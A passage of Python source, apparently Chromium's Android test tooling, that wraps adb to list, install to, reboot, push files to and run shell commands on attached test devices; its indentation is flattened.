i = random.randint(0, 1000000)
self.name = '%s/%s-%d-%010d%s' % (
android_commands.GetExternalStorage(),
prefix, int(time.time()), i, suffix)
if not android_commands.FileExistsOnDevice(self.name):
break
def __enter__(self):
return self
def __exit__(self, type, value, traceback):
self.close()
def close(self):
self.android_commands.RunShellCommand('rm ' + self.name)
def GetAVDs():
"""Returns a list of AVDs."""
re_avd = re.compile('^[ ]+Name: ([a-zA-Z0-9_:.-]+)', re.MULTILINE)
avds = re_avd.findall(cmd_helper.GetCmdOutput(['android', 'list', 'avd']))
return avds
def ResetBadDevices():
"""Removes the blacklist that keeps track of bad devices for a current
build.
"""
device_blacklist.ResetBlacklist()
def ExtendBadDevices(devices):
"""Adds devices to the blacklist that keeps track of bad devices for a
current build.
The devices listed in the bad devices file will not be returned by
GetAttachedDevices.
Args:
devices: list of bad devices to be added to the bad devices file.
"""
device_blacklist.ExtendBlacklist(devices)
def GetAttachedDevices(hardware=True, emulator=True, offline=False):
"""Returns a list of attached, android devices and emulators.
If a preferred device has been set with ANDROID_SERIAL, it will be first in
the returned list. The arguments specify what devices to include in the list.
Example output:
* daemon not running. starting it now on port 5037 *
* daemon started successfully *
List of devices attached
027c10494100b4d7 device
emulator-5554 offline
Args:
hardware: Include attached actual devices that are online.
emulator: Include emulators (i.e. AVD's) currently on host.
offline: Include devices and emulators that are offline.
Returns: List of devices.
"""
adb_devices_output = cmd_helper.GetCmdOutput([constants.GetAdbPath(),
'devices'])
re_device = re.compile('^([a-zA-Z0-9_:.-]+)\tdevice$', re.MULTILINE)
online_devices = re_device.findall(adb_devices_output)
re_device = re.compile('^(emulator-[0-9]+)\tdevice', re.MULTILINE)
emulator_devices = re_device.findall(adb_devices_output)
re_device = re.compile('^([a-zA-Z0-9_:.-]+)\t(?:offline|unauthorized)$',
re.MULTILINE)
offline_devices = re_device.findall(adb_devices_output)
devices = []
if hardware and emulator:
devices = online_devices
elif hardware:
devices = [device for device in online_devices
if device not in emulator_devices]
elif emulator:
devices = emulator_devices
if offline:
devices = devices + offline_devices
blacklist = device_blacklist.ReadBlacklist()
if len(blacklist):
logging.info('Avoiding bad devices %s', ' '.join(blacklist))
devices = [device for device in devices if device not in blacklist]
preferred_device = os.environ.get('ANDROID_SERIAL')
if preferred_device in devices:
devices.remove(preferred_device)
devices.insert(0, preferred_device)
return devices
def IsDeviceAttached(device):
"""Return true if the device is attached and online."""
return device in GetAttachedDevices()
def _GetFilesFromRecursiveLsOutput(path, ls_output, re_file, utc_offset=None):
"""Gets a list of files from `ls` command output.
Python's os.walk isn't used because it doesn't work over adb shell.
Args:
path: The path to list.
ls_output: A list of lines returned by an `ls -lR` command.
re_file: A compiled regular expression which parses a line into named groups
consisting of at minimum "filename", "date", "time", "size" and
optionally "timezone".
utc_offset: A 5-character string of the form +HHMM or -HHMM, where HH is a
2-digit string giving the number of UTC offset hours, and MM is a
2-digit string giving the number of UTC offset minutes. If the input
utc_offset is None, will try to look for the value of "timezone" if it
is specified in re_file.
Returns:
A dict of {"name": (size, lastmod), ...} where:
name: The file name relative to |path|'s directory.
size: The file size in bytes (0 for directories).
lastmod: The file last modification date in UTC.
"""
re_directory = re.compile('^%s/(?P<dir>[^:]+):$' % re.escape(path))
path_dir = os.path.dirname(path)
current_dir = ''
files = {}
for line in ls_output:
directory_match = re_directory.match(line)
if directory_match:
current_dir = directory_match.group('dir')
continue
file_match = re_file.match(line)
if file_match:
filename = os.path.join(current_dir, file_match.group('filename'))
if filename.startswith(path_dir):
filename = filename[len(path_dir) + 1:]
lastmod = datetime.datetime.strptime(
file_match.group('date') + ' ' + file_match.group('time')[:5],
'%Y-%m-%d %H:%M')
if not utc_offset and 'timezone' in re_file.groupindex:
utc_offset = file_match.group('timezone')
if isinstance(utc_offset, str) and len(utc_offset) == 5:
utc_delta = datetime.timedelta(hours=int(utc_offset[1:3]),
minutes=int(utc_offset[3:5]))
if utc_offset[0:1] == '-':
utc_delta = -utc_delta
lastmod -= utc_delta
files[filename] = (int(file_match.group('size')), lastmod)
return files
def _ParseMd5SumOutput(md5sum_output):
"""Returns a list of tuples from the provided md5sum output.
Args:
md5sum_output: output directly from md5sum binary.
Returns:
List of namedtuples with attributes |hash| and |path|, where |path| is the
absolute path to the file with an Md5Sum of |hash|.
"""
HashAndPath = collections.namedtuple('HashAndPath', ['hash', 'path'])
split_lines = [line.split(' ') for line in md5sum_output]
return [HashAndPath._make(s) for s in split_lines if len(s) == 2]
def _HasAdbPushSucceeded(command_output):
"""Returns whether adb push has succeeded from the provided output."""
if not command_output:
return True
if not re.search('^[0-9]', command_output.splitlines()[-1]):
logging.critical('PUSH FAILED: ' + command_output)
return False
return True
def GetLogTimestamp(log_line, year):
"""Returns the timestamp of the given |log_line| in the given year."""
try:
return datetime.datetime.strptime('%s-%s' % (year, log_line[:18]),
'%Y-%m-%d %H:%M:%S.%f')
except (ValueError, IndexError):
logging.critical('Error reading timestamp from ' + log_line)
return None
class AndroidCommands(object):
"""Helper class for communicating with Android device via adb."""
def __init__(self, device=None):
"""Constructor.
Args:
device: If given, adb commands are only send to the device of this ID.
Otherwise commands are sent to all attached devices.
"""
self._adb = adb_interface.AdbInterface(constants.GetAdbPath())
if device:
self._adb.SetTargetSerial(device)
self._device = device
self._logcat = None
self.logcat_process = None
self._logcat_tmpoutfile = None
self._pushed_files = []
self._device_utc_offset = None
self._potential_push_size = 0
self._actual_push_size = 0
self._external_storage = ''
self._util_wrapper = ''
self._system_properties = system_properties.SystemProperties(self.Adb())
self._push_if_needed_cache = {}
self._control_usb_charging_command = {
'command': None,
'cached': False,
}
self._protected_file_access_method_initialized = None
self._privileged_command_runner = None
self._pie_wrapper = None
@property
def system_properties(self):
return self._system_properties
def _LogShell(self, cmd):
"""Logs the adb shell command."""
if self._device:
device_repr = self._device[-4:]
else:
device_repr = '????'
logging.info('[%s]> %s', device_repr, cmd)
def Adb(self):
"""Returns our AdbInterface to avoid us wrapping all its methods."""
return self._adb
def GetDevice(self):
"""Returns the device serial."""
return self._device
def IsOnline(self):
"""Checks whether the device is online.
Returns:
True if device is in 'device' mode, False otherwise.
"""
out = self._adb.SendCommand('devices')
for line in out.split('\n'):
if self._device in line and 'device' in line:
return True
return False
def IsRootEnabled(self):
"""Checks if root is enabled on the device."""
root_test_output = self.RunShellCommand('ls /root') or ['']
return not 'Permission denied' in root_test_output[0]
def EnableAdbRoot(self):
"""Enables adb root on the device.
Returns:
True: if output from executing adb root was as expected.
False: otherwise.
"""
if self.GetBuildType() == 'user':
logging.warning("Can't enable root in production builds with type user")
return False
else:
return_value = self._adb.EnableAdbRoot()
# EnableAdbRoot inserts a call for wait-for-device only when adb logcat
# output matches what is expected. Just to be safe add a call to
# wait-for-device.
self._adb.SendCommand('wait-for-device')
return return_value
def GetDeviceYear(self):
"""Returns the year information of the date on device."""
return self.RunShellCommand('date +%Y')[0]
def GetExternalStorage(self):
if not self._external_storage:
self._external_storage = self.RunShellCommand('echo $EXTERNAL_STORAGE')[0]
if not self._external_storage:
raise device_errors.CommandFailedError(
['shell', "'echo $EXTERNAL_STORAGE'"],
'Unable to find $EXTERNAL_STORAGE')
return self._external_storage
def WaitForDevicePm(self, timeout=120):
"""Blocks until the device's package manager is available.
To workaround http://b/5201039, we restart the shell and retry if the
package manager isn't back after 120 seconds.
Raises:
errors.WaitForResponseTimedOutError after max retries reached.
"""
last_err = None
retries = 3
while retries:
try:
self._adb.WaitForDevicePm(wait_time=timeout)
return # Success
except errors.WaitForResponseTimedOutError as e:
last_err = e
logging.warning('Restarting and retrying after timeout: %s', e)
retries -= 1
self.RestartShell()
raise last_err # Only reached after max retries, re-raise the last error.
def RestartShell(self):
"""Restarts the shell on the device. Does not block for it to return."""
self.RunShellCommand('stop')
self.RunShellCommand('start')
def Reboot(self, full_reboot=True):
"""Reboots the device and waits for the package manager to return.
Args:
full_reboot: Whether to fully reboot the device or just restart the shell.
"""
# TODO(torne): hive can't reboot the device either way without breaking the
if os.environ.get('USING_HIVE'):
logging.warning('Ignoring reboot request as we are on hive')
return
if full_reboot or not self.IsRootEnabled():
self._adb.SendCommand('reboot')
self._system_properties = system_properties.SystemProperties(self.Adb())
timeout = 300
retries = 1
while retries < 10 and self.IsOnline():
time.sleep(1)
retries += 1
else:
self.RestartShell()
timeout = 120
self.WaitForDevicePm(timeout)
self.WaitForSdCardReady(timeout)
def Shutdown(self):
"""Shuts down the device."""
self._adb.SendCommand('reboot -p')
self._system_properties = system_properties.SystemProperties(self.Adb())
def Uninstall(self, package):
"""Uninstalls the specified package from the device.
Args:
package: Name of the package to remove.
Returns:
A status string returned by adb uninstall
"""
uninstall_command = 'uninstall %s' % package
self._LogShell(uninstall_command)
return self._adb.SendCommand(uninstall_command, timeout_time=60)
def Install(self, package_file_path, reinstall=False):
"""Installs the specified package to the device.
Args:
package_file_path: Path to .apk file to install.
reinstall: Reinstall an existing apk, keeping the data.
Returns:
A status string returned by adb install
"""
assert os.path.isfile(package_file_path), ('<%s> is not file' %
package_file_path)
install_cmd = ['install']
if reinstall:
install_cmd.append('-r')
install_cmd.append(package_file_path)
install_cmd = ' '.join(install_cmd)
self._LogShell(install_cmd)
return self._adb.SendCommand(install_cmd,
timeout_time=2 * 60,
retry_count=0)
def ManagedInstall(self, apk_path, keep_data=False, package_name=None,
reboots_on_timeout=2):
"""Installs specified package and reboots device on timeouts.
If package_name is supplied, checks if the package is already installed and
doesn't reinstall if the apk md5sums match.
Args:
apk_path: Path to .apk file to install.
keep_data: Reinstalls instead of uninstalling first, preserving the
application data.
package_name: Package name (only needed if keep_data=False).
reboots_on_timeout: number of time to reboot if package manager is frozen.
"""
# Check if package is already installed and up to date.
if package_name:
installed_apk_path = self.GetApplicationPath(package_name)
if (installed_apk_path and
not self.GetFilesChanged(apk_path, installed_apk_path,
ignore_filenames=True)):
logging.info('Skipped install: identical %s APK already installed' %
package_name)
return
# Install.
reboots_left = reboots_on_timeout
while True:
try:
if not keep_data:
assert package_name
self.Uninstall(package_name)
install_status = self.Install(apk_path, reinstall=keep_data)
if 'Success' in install_status:
return
else:
raise Exception('Install failure: %s' % install_status)
except errors.WaitForResponseTimedOutError:
print '@@@STEP_WARNINGS@@@'
logging.info('Timeout on installing %s on device %s', apk_path,
self._device)
if reboots_left <= 0:
raise Exception('Install timed out')
# Force a hard reboot on last attempt
self.Reboot(full_reboot=(reboots_left == 1))
reboots_left -= 1
def MakeSystemFolderWritable(self):
"""Remounts the /system folder rw."""
out = self._adb.SendCommand('remount')
if out.strip() != 'remount succeeded':
raise errors.MsgException('Remount failed: %s' % out)
def RestartAdbdOnDevice(self):
logging.info('Restarting adbd on the device...')
with DeviceTempFile(self, suffix=".sh") as temp_script_file:
host_script_path = os.path.join(constants.DIR_SOURCE_ROOT,
'build',
'android',
'pylib',
'restart_adbd.sh')
self._adb.Push(host_script_path, temp_script_file.name)
self.RunShellCommand('. %s' % temp_script_file.name)
self._adb.SendCommand('wait-for-device')
def RestartAdbServer(self):
"""Restart the adb server."""
ret = self.KillAdbServer()
if ret != 0:
raise errors.MsgException('KillAdbServer: %d' % ret)
ret = self.StartAdbServer()
if ret != 0:
raise errors.MsgException('StartAdbServer: %d' % ret)
@staticmethod
def KillAdbServer():
"""Kill adb server."""
adb_cmd = [constants.GetAdbPath(), 'kill-server']
ret = cmd_helper.RunCmd(adb_cmd)
retry = 0
while retry < 3:
ret, _ = cmd_helper.GetCmdStatusAndOutput(['pgrep', 'adb'])
if ret != 0:
# pgrep didn't find adb, kill-server succeeded.
return 0
retry += 1
time.sleep(retry)
return ret
def StartAdbServer(self):
"""Start adb server."""
adb_cmd = ['taskset', '-c', '0', constants.GetAdbPath(), 'start-server']
ret, _ = cmd_helper.GetCmdStatusAndOutput(adb_cmd)
retry = 0
while retry < 3:
ret, _ = cmd_helper.GetCmdStatusAndOutput(['pgrep', 'adb'])
if ret == 0:
self._adb.SendCommand('wait-for-device')
return 0
retry += 1
time.sleep(retry)
return ret
def WaitForSystemBootCompleted(self, wait_time):
"""Waits for targeted system's boot_completed flag to be set.
Args:
wait_time: time in seconds to wait
Raises:
WaitForResponseTimedOutError if wait_time elapses and flag still not
set.
"""
logging.info('Waiting for system boot completed...')
self._adb.SendCommand('wait-for-device')
# Now the device is there, but system not boot completed.
# Query the sys.boot_completed flag with a basic command
boot_completed = False
attempts = 0
wait_period = 5
while not boot_completed and (attempts * wait_period) < wait_time:
output = self.system_properties['sys.boot_completed']
output = output.strip()
if output == '1':
boot_completed = True
else:
# If 'error: xxx' returned when querying the flag, it means
# adb server lost the connection to the emulator, so restart the adb
# server.
if 'error:' in output:
self.RestartAdbServer()
time.sleep(wait_period)
attempts += 1
if not boot_completed:
raise errors.WaitForResponseTimedOutError(
'sys.boot_completed flag was not set after %s seconds' % wait_time)
def WaitForSdCardReady(self, timeout_time):
"""Wait for the SD card ready before pushing data into it."""
logging.info('Waiting for SD card ready...')
sdcard_ready = False
attempts = 0
wait_period = 5
external_storage = self.GetExternalStorage()
while not sdcard_ready and attempts * wait_period < timeout_time:
output = self.RunShellCommand('ls ' + external_storage)
if output:
sdcard_ready = True
else:
time.sleep(wait_period)
attempts += 1
if not sdcard_ready:
raise errors.WaitForResponseTimedOutError(
'SD card not ready after %s seconds' % timeout_time)
def GetAndroidToolStatusAndOutput(self, command, lib_path=None, *args, **kw):
"""Runs a native Android binary, wrapping the command as necessary.
This is a specialization of GetShellCommandStatusAndOutput, which is meant
for running tools/android/ binaries and handle properly: (1) setting the
lib path (for component=shared_library), (2) using the PIE wrapper on ICS.
See crbug.com/373219 for more context.
Args:
command: String containing the command to send.
lib_path: (optional) path to the folder containing the dependent libs.
Same other arguments of GetCmdStatusAndOutput.
"""
# The first time this command is run the device is inspected to check
# whether a wrapper for running PIE executable is needed (only Android ICS)
# or not. The results is cached, so the wrapper is pushed only once.
if self._pie_wrapper is None:
# None: did not check; '': did check and not needed; '/path': use /path.
self._pie_wrapper = ''
if self.GetBuildId().startswith('I'): # Ixxxx = Android ICS.
run_pie_dist_path = os.path.join(constants.GetOutDirectory(), 'run_pie')
assert os.path.exists(run_pie_dist_path), 'Please build run_pie'
# The PIE loader must be pushed manually (i.e. no PushIfNeeded) because
# PushIfNeeded requires md5sum and md5sum requires the wrapper as well.
adb_command = 'push %s %s' % (run_pie_dist_path, PIE_WRAPPER_PATH)
assert _HasAdbPushSucceeded(self._adb.SendCommand(adb_command))
self._pie_wrapper = PIE_WRAPPER_PATH
if self._pie_wrapper:
command = '%s %s' % (self._pie_wrapper, command)
if lib_path:
command = 'LD_LIBRARY_PATH=%s %s' % (lib_path, command)
return self.GetShellCommandStatusAndOutput(command, *args, **kw)
# It is tempting to turn this function into a generator, however this is not
# possible without using a private (local) adb_shell instance (to ensure no
# other command interleaves usage of it), which would defeat the main aim of
# being able to reuse the adb shell instance across commands.
def RunShellCommand(self, command, timeout_time=20, log_result=False):
"""Send a command to the adb shell and return the result.
Args:
command: String containing the shell command to send.
timeout_time: Number of seconds to wait for command to respond before
retrying, used by AdbInterface.SendShellCommand.
log_result: Boolean to indicate whether we should log the result of the
shell command.
Returns:
list containing the lines of output received from running the command
"""
self._LogShell(command)
if "'" in command:
command = command.replace('\'', '\'\\\'\'')
result = self._adb.SendShellCommand(
"'%s'" % command, timeout_time).splitlines()
result = [ l for l in result if not l.startswith('WARNING') ]
if ['error: device not found'] == result:
raise errors.DeviceUnresponsiveError('device not found')
if log_result:
self._LogShell('\n'.join(result))
return result
def GetShellCommandStatusAndOutput(self, command, timeout_time=20,
log_result=False):
"""See RunShellCommand() above.
Returns:
The tuple (exit code, list of output lines).
"""
lines = self.RunShellCommand(
command + '; echo %$?', timeout_time, log_result)
last_line = lines[-1]
status_pos = last_line.rfind('%')
assert status_pos >= 0
status = int(last_line[status_pos + 1:])
if status_pos == 0:
lines = lines[:-1]
else:
lines = lines[:-1] + [last_line[:status_pos]]
return (status, lines)
def KillAll(self, process, signum=9, with_su=False):
"""Android version of killall, connected via adb.
Args:
process: name of the process to kill off.
signum: signal to use, 9 (SIGKILL) by default.
with_su: wether or not to use su to kill the processes.
Returns:
the number of processes killed
"""
pids = self.ExtractPid(process)
if pids:
cmd = 'kill -%d %s' % (signum, ' '.join(pids))
if with_su:
self.RunShellCommandWithSU(cmd)
else:
self.RunShellCommand(cmd)
return len(pids)
def KillAllBlocking(self, process, timeout_sec, signum=9, with_su=False):
"""Blocking version of killall, connected via adb.
This waits until no process matching the corresponding name appears in ps'
output anymore.
Args:
process: name of the process to kill off
timeout_sec: the timeout in seconds
signum: same as |KillAll|
with_su: same as |KillAll|
Returns:
the number of processes killed
"""
processes_killed = self.KillAll(process, signum=signum, with_su=with_su)
if processes_killed:
elapsed = 0
wait_period = 0.1
# Note that this doesn't take into account the time spent in ExtractPid().
while self.ExtractPid(process) and elapsed < timeout_sec:
time.sleep(wait_period)
elapsed += wait_period
if elapsed >= timeout_sec:
return processes_killed - self.ExtractPid(process)
return processes_killed
@staticmethod
def _GetActivityCommand(package, activity, wait_for_completion, action,
category, data, extras, trace_file_name, force_stop,
flags):
"""Creates command to start |package|'s activity on the device.
Args - as for StartActivity
Returns:
the command to run on the target to start the activity
"""
cmd = 'am start -a %s' % action
if force_stop:
cmd += ' -S'
if wait_for_completion:
cmd += ' -W'
if category:
cmd += ' -c %s' % category
if package and activity:
cmd += ' -n %s/%s' % (package, activity)
if data:
cmd += ' -d "%s"' % data
if extras:
for key in extras:
value = extras[key]
if isinstance(value, str):
cmd += ' --es'
elif isinstance(value, bool):
cmd += ' --ez'
elif isinstance(value, int):
cmd += ' --ei'
else:
raise NotImplementedError(
'Need to teach StartActivity how to pass %s extras' % type(value))
cmd += ' %s %s' % (key, value)
if trace_file_name:
cmd += ' --start-profiler ' + trace_file_name
if flags:
cmd += ' -f %s' % flags
return cmd
def StartActivity(self, package, activity, wait_for_completion=False,
action='android.intent.action.VIEW',
category=None, data=None,
extras=None, trace_file_name=None,
force_stop=False, flags=None):
"""Starts |package|'s activity on the device.
Args:
package: Name of package to start (e.g. 'com.google.android.apps.chrome').
activity: Name of activity (e.g. '.Main' or
'com.google.android.apps.chrome.Main').
wait_for_completion: wait for the activity to finish launching (-W flag).
action: string (e.g. "android.intent.action.MAIN"). Default is VIEW.
category: string (e.g. "android.intent.category.HOME")
data: Data string to pass to activity (e.g. 'http://www.example.com/').
extras: Dict of extras to pass to activity. Values are significant.
trace_file_name: If used, turns on and saves the trace to this file name.
force_stop: force stop the target app before starting the activity (-S
flag).
Returns:
The output of the underlying command as a list of lines.
"""
cmd = self._GetActivityCommand(package, activity, wait_for_completion,
action, category, data, extras,
trace_file_name, force_stop, flags)
return self.RunShellCommand(cmd)
def StartActivityTimed(self, package, activity, wait_for_completion=False,
action='android.intent.action.VIEW',
category=None, data=None,
extras=None, trace_file_name=None,
force_stop=False, flags=None):
"""Starts |package|'s activity on the device, returning the start time
Args - as for StartActivity
Returns:
A tuple containing:
- the output of the underlying command as a list of lines, and
- a timestamp string for the time at which the activity started
"""
cmd = self._GetActivityCommand(package, activity, wait_for_completion,
action, category, data, extras,
trace_file_name, force_stop, flags)
self.StartMonitoringLogcat()
out = self.RunShellCommand('log starting activity; ' + cmd)
activity_started_re = re.compile('.*starting activity.*')
m = self.WaitForLogMatch(activity_started_re, None)
assert m
start_line = m.group(0)
return (out, GetLogTimestamp(start_line, self.GetDeviceYear()))
def StartCrashUploadService(self, package):
# TODO(frankf): We really need a python wrapper around Intent
# to be shared with StartActivity/BroadcastIntent.
cmd = (
'am startservice -a %s.crash.ACTION_FIND_ALL -n '
'%s/%s.crash.MinidumpUploadService' %
(constants.PACKAGE_INFO['chrome'].package,
package,
constants.PACKAGE_INFO['chrome'].package))
am_output = self.RunShellCommandWithSU(cmd)
assert am_output and 'Starting' in am_output[-1], (
'Service failed to start: %s' % am_output)
time.sleep(15)
def BroadcastIntent(self, package, intent, *args):
"""Send a broadcast intent.
Args:
package: Name of package containing the intent.
intent: Name of the intent.
args: Optional extra arguments for the intent.
"""
cmd = 'am broadcast -a %s.%s %s' % (package, intent, ' '.join(args))
self.RunShellCommand(cmd)
def GoHome(self):
"""Tell the device to return to the home screen. Blocks until completion."""
self.RunShellCommand('am start -W '
'-a android.intent.action.MAIN -c android.intent.category.HOME')
def CloseApplication(self, package):
"""Attempt to close down the application, using increasing violence.
Args:
package: Name of the process to kill off, e.g.
com.google.android.apps.chrome
"""
self.RunShellCommand('am force-stop ' + package)
def GetApplicationPath(self, package):
"""Get the installed apk path on the device for the given package.
Args:
package: Name of the package.
Returns:
Path to the apk on the device if it exists, None otherwise.
"""
pm_path_output = self.RunShellCommand('pm path ' + package)
# The path output contains anything if and only if the package
# exists.
if pm_path_output:
# pm_path_output is of the form: "package:/path/to/foo.apk"
return pm_path_output[0].split(':')[1]
else:
return None
def ClearApplicationState(self, package):
"""Closes and clears all state for the given |package|."""
# Check that the package exists before clearing it. Necessary because
# calling pm clear on a package that doesn't exist may never return.
pm_path_output = self.RunShellCommand('pm path ' + package)
if pm_path_output:
self.RunShellCommand('pm clear ' + package)
def SendKeyEvent(self, keycode):
"""Sends keycode to the device.
Args:
keycode: Numeric keycode to send (see "enum" at top of file).
"""
self.RunShellCommand('input keyevent %d' % keycode)
def _RunMd5Sum(self, host_path, device_path):
"""Gets the md5sum of a host path and device path.
Args:
host_path: Path (file or directory) on the host.
device_path: Path on the device.
Returns:
A tuple containing lists of the host and device md5sum results as
created by _ParseMd5SumOutput().
"""
md5sum_dist_path = os.path.join(constants.GetOutDirectory(),
'md5sum_dist')
assert os.path.exists(md5sum_dist_path), 'Please build md5sum.'
md5sum_dist_mtime = os.stat(md5sum_dist_path).st_mtime
if (md5sum_dist_path not in self._push_if_needed_cache or
self._push_if_needed_cache[md5sum_dist_path] != md5sum_dist_mtime):
command = 'push %s %s' % (md5sum_dist_path, MD5SUM_DEVICE_FOLDER)
assert _HasAdbPushSucceeded(self._adb.SendCommand(command))
self._push_if_needed_cache[md5sum_dist_path] = md5sum_dist_mtime
(_, md5_device_output) = self.GetAndroidToolStatusAndOutput(
self._util_wrapper + ' ' + MD5SUM_DEVICE_PATH + ' ' + device_path,
lib_path=MD5SUM_DEVICE_FOLDER,
timeout_time=2 * 60)
device_hash_tuples = _ParseMd5SumOutput(md5_device_output)
assert os.path.exists(host_path), 'Local path not found %s' % host_path
md5sum_output = cmd_helper.GetCmdOutput(
[os.path.join(constants.GetOutDirectory(), 'md5sum_bin_host'),
host_path])
host_hash_tuples = _ParseMd5SumOutput(md5sum_output.splitlines())
return (host_hash_tuples, device_hash_tuples)
def GetFilesChanged(self, host_path, device_path, ignore_filenames=False):
"""Compares the md5sum of a host path against a device path.
Note: Ignores extra files on the device.
Args:
host_path: Path (file or directory) on the host.
device_path: Path on the device.
ignore_filenames: If True only the file contents are considered when
checking whether a file has changed, otherwise the relative path
must also match.
Returns:
A list of tuples of the form (host_path, device_path) for files whose
md5sums do not match.
"""
real_host_path = os.path.realpath(host_path)
real_device_path = self.RunShellCommand('realpath "%s"' % device_path)[0]
host_hash_tuples, device_hash_tuples = self._RunMd5Sum(
real_host_path, real_device_path)
if len(host_hash_tuples) > len(device_hash_tuples):
logging.info('%s files do not exist on the device' %
(len(host_hash_tuples) - len(device_hash_tuples)))
host_rel = [(os.path.relpath(os.path.normpath(t.path), real_host_path),
t.hash)
for t in host_hash_tuples]
if os.path.isdir(real_host_path):
def RelToRealPaths(rel_path):
return (os.path.join(real_host_path, rel_path),
os.path.join(real_device_path, rel_path))
else:
assert len(host_rel) == 1
def RelToRealPaths(_):
return (real_host_path, real_device_path)
if ignore_filenames:
device_hashes = set([h.hash for h in device_hash_tuples])
ShouldPush = lambda p, h: h not in device_hashes
else:
device_rel = dict([(os.path.relpath(os.path.normpath(t.path),
real_device_path),
t.hash)
for t in device_hash_tuples])
ShouldPush = lambda p, h: p not in device_rel or h != device_rel[p]
return [RelToRealPaths(path) for path, host_hash in host_rel
if ShouldPush(path, host_hash)]
def PushIfNeeded(self, host_path, device_path):
"""Pushes |host_path| to |device_path|.
Works for files and directories. This method skips copying any paths in
|test_data_paths| that already exist on the device with the same hash.
All pushed files can be removed by calling RemovePushedFiles().
"""
MAX_INDIVIDUAL_PUSHES = 50
if not os.path.exists(host_path):
raise device_errors.CommandFailedError(
'Local path not found %s' % host_path, device=str(self))
# on the device don't modify the files.
if not os.path.isdir(host_path):
if host_path in self._push_if_needed_cache:
host_path_mtime = self._push_if_needed_cache[host_path]
if host_path_mtime == os.stat(host_path).st_mtime:
return
size = host_utils.GetRecursiveDiskUsage(host_path)
self._pushed_files.append(device_path)
self._potential_push_size += size
if os.path.isdir(host_path):
self.RunShellCommand('mkdir -p "%s"' % device_path)
changed_files = self.GetFilesChanged(host_path, device_path)
logging.info('Found %d files that need to be pushed to %s',
len(changed_files), device_path)
if not changed_files:
return
def Push(host, device):
# of 60 seconds which isn't sufficient for a lot of users of this method.
push_command = 'push %s %s' % (host, device)
self._LogShell(push_command)
retry = 0
while True:
output = self._adb.SendCommand(push_command, timeout_time=30 * 60)
if _HasAdbPushSucceeded(output):
if not os.path.isdir(host_path):
self._push_if_needed_cache[host] = os.stat(host).st_mtime
return
if retry < 3:
retry += 1
wait_time = 5 * retry
logging.error('Push failed, retrying in %d seconds: %s' %
(wait_time, output))
time.sleep(wait_time)
else:
raise Exception('Push failed: %s' % output)
diff_size = 0
if len(changed_files) <= MAX_INDIVIDUAL_PUSHES:
diff_size = sum(host_utils.GetRecursiveDiskUsage(f[0])
for f in changed_files)
if len(changed_files) > MAX_INDIVIDUAL_PUSHES or diff_size > 0.5 * size:
self._actual_push_size += size
Push(host_path, device_path)
else:
for f in changed_files:
Push(f[0], f[1])
self._actual_push_size += diff_size
def GetPushSizeInfo(self):
"""Get total size of pushes to the device done via PushIfNeeded()
Returns:
A tuple:
1. Total size of push requests to PushIfNeeded (MB)
2. Total size that was actually pushed (MB)
"""
return (self._potential_push_size, self._actual_push_size)
def GetFileContents(self, filename, log_result=False):
"""Gets contents from the file specified by |filename|."""
return self.RunShellCommand('cat "%s" 2>/dev/null' % filename,
log_result=log_result)
def SetFileContents(self, filename, contents):
"""Writes |contents| to the file specified by |filename|."""
with tempfile.NamedTemporaryFile() as f:
f.write(contents)
f.flush()
self._adb.Push(f.name, filename)
def RunShellCommandWithSU(self, command, timeout_time=20, log_result=False):
return self.RunShellCommand('su -c %s' % command, timeout_time, log_result)
def CanAccessProtectedFileContents(self):
"""Returns True if Get/SetProtectedFileContents would work via "su" or adb
shell running as root.
Devices running user builds don't have adb root, but may provide "su" which
can be used for accessing protected files.
"""
return (self._GetProtectedFileCommandRunner() != None)
def _GetProtectedFileCommandRunner(self):
"""Finds the best method to access protected files on the device.
Returns:
1. None when privileged files cannot be accessed on the device.
2. Otherwise: A function taking a single parameter: a string with command
line arguments. Running that function executes the command with
the appropriate method.
"""
if self._protected_file_access_method_initialized:
return self._privileged_command_runner
self._privileged_command_runner = None
self._protected_file_access_method_initialized = True
for cmd in [self.RunShellCommand, self.RunShellCommandWithSU]:
# Get contents of the auxv vector for the init(8) process from a small
# binary file that always exists on linux and is always read-protected.
contents = cmd('cat /proc/1/auxv')
# The leading 4 or 8-bytes of auxv vector is a_type. There are not many
# reserved a_type values, hence byte 2 must always be '\0' for a realistic
# auxv. See /usr/include/elf.h.
if len(contents) > 0 and (contents[0][2] == '\0'):
self._privileged_command_runner = cmd
break
return self._privileged_command_runner
def GetProtectedFileContents(self, filename):
"""Gets contents from the protected file specified by |filename|.
This is potentially less efficient than GetFileContents.
"""
command = 'cat "%s" 2> /dev/null' % filename
command_runner = self._GetProtectedFileCommandRunner()
if command_runner:
return command_runner(command)
else:
logging.warning('Could not access protected file: %s' % filename)
return []
def SetProtectedFileContents(self, filename, contents):
"""Writes |contents| to the protected file specified by |filename|.
This is less efficient than SetFileContents.
"""
with DeviceTempFile(self) as temp_file:
with DeviceTempFile(self, suffix=".sh") as temp_script:
# Put the contents in a temporary file
self.SetFileContents(temp_file.name, contents)
# Create a script to copy the file contents to its final destination
self.SetFileContents(temp_script.name,
'cat %s > %s' % (temp_file.name, filename))
command = 'sh %s' % temp_script.name
command_runner = self._GetProtectedFileCommandRunner()
if command_runner:
return command_runner(command)
else:
logging.warning(
'Could not set contents of protected file: %s' % filename)
def RemovePushedFiles(self):
"""Removes all files pushed with PushIfNeeded() from the device."""
for p in self._pushed_files:
self.RunShellCommand('rm -r %s' % p, timeout_time=2 * 60)
def ListPathContents(self, path):
"""Lists files in all subdirectories of |path|.
Args:
path: The path to list.
Returns:
A dict of {"name": (size, lastmod), ...}.
"""
# Example output:
# /foo/bar:
# -rw-r----- user group 102 2011-05-12 12:29:54.131623387 +0100 baz.txt
re_file = re.compile('^-(?P<perms>[^\s]+)\s+'
'(?P<user>[^\s]+)\s+'
'(?P<group>[^\s]+)\s+'
'(?P<size>[^\s]+)\s+'
'(?P<date>[^\s]+)\s+'
'(?P<time>[^\s]+)\s+'
'(?P<filename>[^\s]+)$')
return _GetFilesFromRecursiveLsOutput(
path, self.RunShellCommand('ls -lR %s' % path), re_file,
self.GetUtcOffset())
def GetUtcOffset(self):
if not self._device_utc_offset:
self._device_utc_offset = self.RunShellCommand('date +%z')[0]
return self._device_utc_offset
def SetJavaAssertsEnabled(self, enable):
"""Sets or removes the device java assertions property.
Args:
enable: If True the property will be set.
Returns:
True if the file was modified (reboot is required for it to take effect).
"""
# First ensure the desired property is persisted.
temp_props_file = tempfile.NamedTemporaryFile()
properties = ''
if self._adb.Pull(LOCAL_PROPERTIES_PATH, temp_props_file.name):
with open(temp_props_file.name) as f:
properties = f.read()
